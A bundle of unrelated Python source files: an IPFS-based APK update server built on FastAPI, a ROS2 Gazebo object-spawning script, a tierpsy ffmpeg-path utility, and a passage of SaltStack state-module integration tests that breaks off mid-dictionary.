import os
import time
import ipfshttpclient
import redis as redis
from fastapi import FastAPI, File, UploadFile, Form
def loadjson(jsonfile):
with open(jsonfile) as json_file:
data = json.load(json_file)
return data
app = FastAPI()
conf = loadjson(os.path.join(os.path.dirname(os.path.abspath(__file__)), "config.json"))
api = ipfshttpclient.connect(conf['ipfsApi'], timeout=3600)
def getupdatejson(hash):
stat = api.files.stat('/ipfs/' + hash)
if not stat['Type'] == 'directory':
return 'ERR: hash is not directory.'
file = api.object.links('/ipfs/' + hash)
for fl in file['Links']:
if fl['Name'] == 'update.json':
return json.loads(api.cat(fl['Hash']))
def publish(ipns, ipfs):
from threading import Thread
def setipns(ipns, ipfs):
api.name.publish('/ipfs/%s' % ipfs, key=ipns, lifetime='8760h')
redcfs = conf['redisCacheServer']
for redcf in redcfs:
red = redis.Redis(host=redcf["host"], port=redcf["port"], decode_responses=True)
red.set(ipns, ipfs)
t = Thread(target=setipns, args=(ipns, ipfs))
t.start()
return
@app.get('/getkeys')
def getKeys():
keys = api.key.list()
result = []
for k in keys['Keys']:
if k['Name'].startswith(conf['storageSubPath'] + '_'):
result.append(k)
return {"api": conf['ipfsApi'], "gw": conf['ipfsGW'], "keys": result}
@app.get('/newkey')
def newKey(keyname: str):
if not keyname.isalnum():
return 'keyname not allow'
keys = api.key.list()
for k in keys['Keys']:
if k['Name'] == conf['storageSubPath'] + '_' + keyname:
return 'keyname Already.'
key = api.key.gen(conf['storageSubPath'] + '_' + keyname, type="rsa")
return key
@app.get('/getupdate')
def getUpdate(ipns: str):
red = redis.Redis(host=conf['redisCacheServer'][0]["host"],
port=conf['redisCacheServer'][0]["port"],
decode_responses=True)
ipfs = red.get(ipns)
if ipfs is None:
update = {
"title": conf['projectName'],
"data": [],
}
return update
else:
result = getupdatejson(ipfs)
result['ipfs'] = ipfs
return result
@app.post('/newversion')
def newVersion(ipns: str = Form(...),
title: str = Form(...),
version:str = Form(...),
build:str = Form(...),
log:str = Form(...),
apk: UploadFile = File(...)):
apkname = "%s_%s_%s.apk" % (conf['projectName'].lower(), version, build)
apkpath = os.path.join(conf['localStorage'], conf['storageSubPath'])
if not os.path.isdir(apkpath):
os.mkdir(apkpath)
with open(os.path.join(apkpath, apkname), "wb") as f:
f.write(apk.file.read())
apkhash = api.add(os.path.join(apkpath, apkname))
red = redis.Redis(host=conf['redisCacheServer'][0]["host"],
port=conf['redisCacheServer'][0]["port"],
decode_responses=True)
ipfs = red.get(ipns)
if ipfs is None:
update = {
"title": conf['projectName'],
"data": [],
}
ipfs = conf['uiTemplate']
else:
update = getupdatejson(ipfs)
update['data'].append({
"title": title,
"version": version,
"build": build,
"log": log,
"apk_file": os.path.join(conf['storageSubPath'], apkname),
"datetime": int(time.time())
})
update['last'] = build
updatehash = api.add_json(update)
files = api.object.links(ipfs)
dirhash = api.object.new("unixfs-dir")
for fl in files['Links']:
if fl['Name'] == conf['storageSubPath']:
dirhash = fl
# add apk file in hash
dirhash = api.object.patch.add_link(dirhash['Hash'], apkname, apkhash['Hash'])
hash = conf['uiTemplate']
hash = api.object.patch.add_link(hash, conf['storageSubPath'], dirhash['Hash'])
hash = api.object.patch.add_link(hash['Hash'], 'update.json', updatehash)
publish(ipns, hash['Hash'])
return {"newhash": hash['Hash']}
@app.get('/delversion')
def delVersion(ipns, build):
red = redis.Redis(host=conf['redisCacheServer'][0]["host"],
port=conf['redisCacheServer'][0]["port"],
decode_responses=True)
ipfs = red.get(ipns)
if ipfs is None:
return 'no Version.'
update = getupdatejson(ipfs)
newupdate = {
"title": conf['projectName'],
"data": [],
}
for item in update['data']:
if not item['build'] == build:
newupdate['data'].append(item)
else:
apkname = "%s_%s_%s.apk" % (conf['projectName'].lower(), item['version'], build)
if update['last'] == build:
last = 0
for i in range(len(newupdate['data'])):
if newupdate['data'][i]['datetime'] > newupdate['data'][last]['datetime']:
last = i
newupdate['last'] = newupdate['data'][last]['build']
else:
newupdate['last'] = update['last']
updatehash = api.add_json(newupdate)
files = api.object.links(ipfs)
dirhash = api.object.new("unixfs-dir")
for fl in files['Links']:
if fl['Name'] == conf['storageSubPath']:
dirhash = fl
# del apk file in hash
dirhash = api.object.patch.rm_link(dirhash['Hash'], apkname)
hash = conf['uiTemplate']
hash = api.object.patch.add_link(hash, conf['storageSubPath'], dirhash['Hash'])
hash = api.object.patch.add_link(hash['Hash'], 'update.json', updatehash)
publish(ipns, hash['Hash'])
return {"newhash": hash['Hash']}
@app.post('/upversion')
def upVersion(ipns: str = Form(...),
title: str = Form(...),
version:str = Form(...),
build:str = Form(...),
log:str = Form(...),
apk: UploadFile = File(None)):
red = redis.Redis(host=conf['redisCacheServer'][0]["host"],
port=conf['redisCacheServer'][0]["port"],
decode_responses=True)
ipfs = red.get(ipns)
if ipfs is None:
return 'no Version.'
files = api.object.links(ipfs)
dirhash = api.object.new("unixfs-dir")
for fl in files['Links']:
if fl['Name'] == conf['storageSubPath']:
dirhash = fl
if apk:
apkname = "%s_%s_%s.apk" % (conf['projectName'].lower(), version, build)
apkpath = os.path.join(conf['localStorage'], conf['storageSubPath'])
if not os.path.isdir(apkpath):
os.mkdir(apkpath)
with open(os.path.join(apkpath, apkname), "wb") as f:
f.write(apk.file.read())
apkhash = api.add(os.path.join(apkpath, apkname))
update = getupdatejson(ipfs)
newupdate = {
"title": conf['projectName'],
"data": [],
}
for item in update['data']:
if not item['build'] == build:
newupdate['data'].append(item)
else:
if apk:
apk_file = os.path.join(conf['storageSubPath'], apkname)
dirhash = api.object.patch.rm_link(dirhash['Hash'], item['apk_file'].split('/')[1])
dirhash = api.object.patch.add_link(dirhash['Hash'], apkname, apkhash['Hash'])
else:
apk_file = item['apk_file']
newupdate['data'].append({
"title": title,
"version": version,
"build": build,
"log": log,
"apk_file": apk_file,
"datetime": int(time.time())
})
newupdate['last'] = build
updatehash = api.add_json(newupdate)
hash = conf['uiTemplate']
hash = api.object.patch.add_link(hash, conf['storageSubPath'], dirhash['Hash'])
hash = api.object.patch.add_link(hash['Hash'], 'update.json', updatehash)
publish(ipns, hash['Hash'])
return {"newhash": hash['Hash']}
if __name__ == '__main__':
import uvicorn
runConf = conf['service']
uvicorn.run(app=app,
host=runConf['host'],
port=runConf['port'],
workers=runConf['workers'])
|
spawn_object.py
|
# taken from https://zmk5.github.io/general/demo/2019/07/15/ros2-spawning-entity.html
import os
import sys
import rclpy
from multiprocessing import Process
from ament_index_python.packages import get_package_share_directory
from gazebo_msgs.srv import SpawnEntity
def spawn_object(model):
rclpy.init()
node = rclpy.create_node("entity_spawner")
node.get_logger().info(
'Creating Service client to connect to `/spawn_entity`')
client = node.create_client(SpawnEntity, "/spawn_entity")
node.get_logger().info("Connecting to `/spawn_entity` service...")
if not client.service_is_ready():
client.wait_for_service()
node.get_logger().info("...connected!")
request = SpawnEntity.Request()
request.name = model[0]
request.xml = open(model[1], 'r').read()
request.robot_namespace = "spawned_object"
request.initial_pose.position.x, request.initial_pose.position.y, request.initial_pose.position.z = model[2]
node.get_logger().info("Sending service request to `/spawn_entity`")
future = client.call_async(request)
rclpy.spin_until_future_complete(node, future)
if future.result() is not None:
print('response: %r' % future.result())
else:
raise RuntimeError(
'exception while calling service: %r' % future.exception())
node.get_logger().info("Done! Shutting down node.")
node.destroy_node()
rclpy.shutdown()
def main():
beer = ["beer", "/root/robotic_arm/models/beer/model.sdf", (-0.5, 0.5, 0.)]
coke = ["coke_can", "/root/robotic_arm/models/coke_can/model.sdf", (0.5, .5, 0.)]
processes = []
processes.append(Process(target=spawn_object, args=(beer, )))
processes.append(Process(target=spawn_object, args=(coke, )))
for process in processes:
process.start()
for process in processes:
process.join()
if __name__ == '__main__':
main()
|
misc.py
|
import shutil
import sys
import os
import tables
import warnings
from threading import Thread
from queue import Queue, Empty
from tierpsy import AUX_FILES_DIR
# get the correct path for ffmpeg. First we look in the aux
# directory, otherwise we look in the system path.
def get_local_or_sys_path(file_name):
file_source = os.path.join(AUX_FILES_DIR, file_name)
if not os.path.exists(file_source):
file_source = shutil.which(file_name)
if not file_source:
raise FileNotFoundError('command not found: %s' % file_name)
return file_source
try:
if sys.platform == 'win32':
FFMPEG_CMD = get_local_or_sys_path('ffmpeg.exe')
elif sys.platform == 'darwin':
FFMPEG_CMD = get_local_or_sys_path('ffmpeg22')
elif sys.platform == 'linux':
FFMPEG_CMD = get_local_or_sys_path('ffmpeg')
except FileNotFoundError:
FFMPEG_CMD = ''
warnings.warn('ffmpeg do not found. This might cause problems while reading .mjpeg files.')
# get the correct path for ffprobe. First we look in the aux
# directory, otherwise we look in the system path.
try:
if os.name == 'nt':
FFPROBE_CMD = get_local_or_sys_path('ffprobe.exe')
else:
FFPROBE_CMD = get_local_or_sys_path('ffprobe')
except FileNotFoundError:
FFPROBE_CMD = ''
warnings.warn('ffprobe do not found. This might cause problems while extracting the raw videos timestamps.')
WLAB = {'U': 0, 'WORM': 1, 'WORMS': 2, 'BAD': 3, 'GOOD_SKE': 4}
# pytables filters.
TABLE_FILTERS = tables.Filters(
complevel=5,
complib='zlib',
shuffle=True,
fletcher32=True)
def print_flush(msg):
print(msg)
sys.stdout.flush()
class ReadEnqueue():
def __init__(self, pipe, timeout=-1):
def _target_fun(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close
self.timeout = timeout
self.queue = Queue()
self.thread = Thread( target=_target_fun, args=(pipe, self.queue))
self.thread.start()
def read(self):
try:
if self.timeout > 0:
line = self.queue.get(timeout=self.timeout)
else:
line = self.queue.get_nowait()
line = line.decode("utf-8")
except Empty:
line = None
return line
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import
import os
import shutil
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.unit import skipIf
from tests.support.paths import TMP
from tests.support.mixins import SaltReturnAssertsMixin
# Import salt libs
import salt.utils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
import salt.ext.six as six
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], str))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
def test_issue_1896_file_append_source(self):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(TMP, 'test.append')
if os.path.isfile(testfile):
os.unlink(testfile)
ret = self.run_function('state.sls', mods='testappend')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-1')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-2')
self.assertSaltTrueReturn(ret)
with salt.utils.fopen(testfile, 'r') as fp_:
testfile_contents = fp_.read()
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
''')
if not salt.utils.is_windows():
contents += os.linesep
contents += textwrap.dedent('''\
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(
contents, testfile_contents)
# Re-append switching order
ret = self.run_function('state.sls', mods='testappend.step-2')
self.assertSaltTrueReturn(ret)
ret = self.run_function('state.sls', mods='testappend.step-1')
self.assertSaltTrueReturn(ret)
with salt.utils.fopen(testfile, 'r') as fp_:
testfile_contents = fp_.read()
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if exiting
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.fopen(testfile, 'r') as fp_:
contents = fp_.read()
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.fopen(testfile, 'r') as fp_:
contents = fp_.read()
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
fnames = (
os.path.join(TMP, 'include-test'),
os.path.join(TMP, 'to-include-test')
)
exclude_test_file = os.path.join(
TMP, 'exclude-test'
)
try:
ret = self.run_function('state.sls', mods='include-test')
self.assertSaltTrueReturn(ret)
for fname in fnames:
self.assertTrue(os.path.isfile(fname))
self.assertFalse(os.path.isfile(exclude_test_file))
finally:
for fname in list(fnames) + [exclude_test_file]:
if os.path.isfile(fname):
os.remove(fname)
def test_exclude(self):
fnames = (
os.path.join(TMP, 'include-test'),
os.path.join(TMP, 'exclude-test')
)
to_include_test_file = os.path.join(
TMP, 'to-include-test'
)
try:
ret = self.run_function('state.sls', mods='exclude-test')
self.assertSaltTrueReturn(ret)
for fname in fnames:
self.assertTrue(os.path.isfile(fname))
self.assertFalse(os.path.isfile(to_include_test_file))
finally:
for fname in list(fnames) + [to_include_test_file]:
if os.path.isfile(fname):
os.remove(fname)
@skipIf(salt.utils.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.fopen(template_path, 'r') as fp_:
template = fp_.read()
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.fopen(template_path, 'r') as fp_:
template = fp_.read()
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loopS prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there where any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_full_sls(self):
'''
Teste the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_full_sls_require_in(self):
'''
Test require_in when including an entire sls
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls',
mods='requisites.fullsls_require_in')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls_import(self):
'''
Test full sls requisite with nothing but an import
'''
ret = self.run_function('state.sls', mods='requisites.fullsls_require_import')
self.assertSaltTrueReturn(ret)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
